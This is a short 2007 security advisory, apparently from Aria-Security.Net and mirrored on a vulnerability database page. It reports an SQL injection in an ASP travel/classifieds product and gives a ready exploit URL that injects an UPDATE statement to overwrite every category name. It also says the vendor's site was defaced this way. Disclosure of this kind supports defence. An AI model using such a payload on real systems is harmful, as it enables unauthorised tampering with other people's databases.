Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18375
HistoryNov 08, 2007 - 12:00 a.m.

Aria-Security.Net Research: Request For Travel Sql Injection

2007-11-0800:00:00
vulners.com
23

Aria-Security Team,
http://Aria-Security.net

Rapid Classfield SQL Injection
Shout Outs: AurA, imm02tal
Vendor: http://www.lotfian.com/UK/PORTALS.asp

http://target/agencyCatResult.asp?cmbCat='%20UPDATE%20rftCategory%20set%20Category%20=%20'Aria-Security
Team';–

The Vendor's website has been attacked by Emperor Team via this vuln.

Regards,
The-0utl4w
From Aria-Security.Net